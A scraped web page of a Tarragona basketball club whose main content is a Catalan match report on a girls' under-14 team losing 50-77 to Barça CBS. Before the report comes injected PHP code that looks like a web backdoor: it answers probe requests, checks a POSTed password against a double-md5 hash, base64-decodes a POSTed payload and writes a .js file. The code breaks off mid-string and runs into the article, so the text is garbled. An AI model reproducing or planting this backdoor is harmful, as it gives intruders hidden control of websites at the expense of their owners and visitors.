function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L’Infantil Femení 08A fa un molt bon partit defensivament però acaba caient davant del Barça CBS (50-77) - Tgn Bàsquet Club -

L’Infantil Femení 08A fa un molt bon partit defensivament però acaba caient davant del Barça CBS (50-77)

Updated: octubre 14, 2021

L’Infatil Femení 08A va fer la millor defensa del que portem de temporada però no va servir per guanyar a un imponent Barça. Les noies del TGN van sortir molt motivades, lluitant totes les pilotes i anant a tots els rebots, cosa que va servir per donar guerra a un rival amb molta altura i amb jugadores de molta qualitat. Fins el minut 25 la diferència al marcador no va baixar dels 10 punts, amb atacs ràpids gràcies a la intensitat defensiva. Però al final de tercer quart tres triples consecutius de les barcelonines van obrir una bretxa al marcador. Les noies entrenades per García no van llançar la toballola i ho van donar tot a l’últim quart deixant un parcial final de 17-14. L’entrenador valora molt positivament l’enfrentament i considera que les jugadores es van deixar les banyes a pista.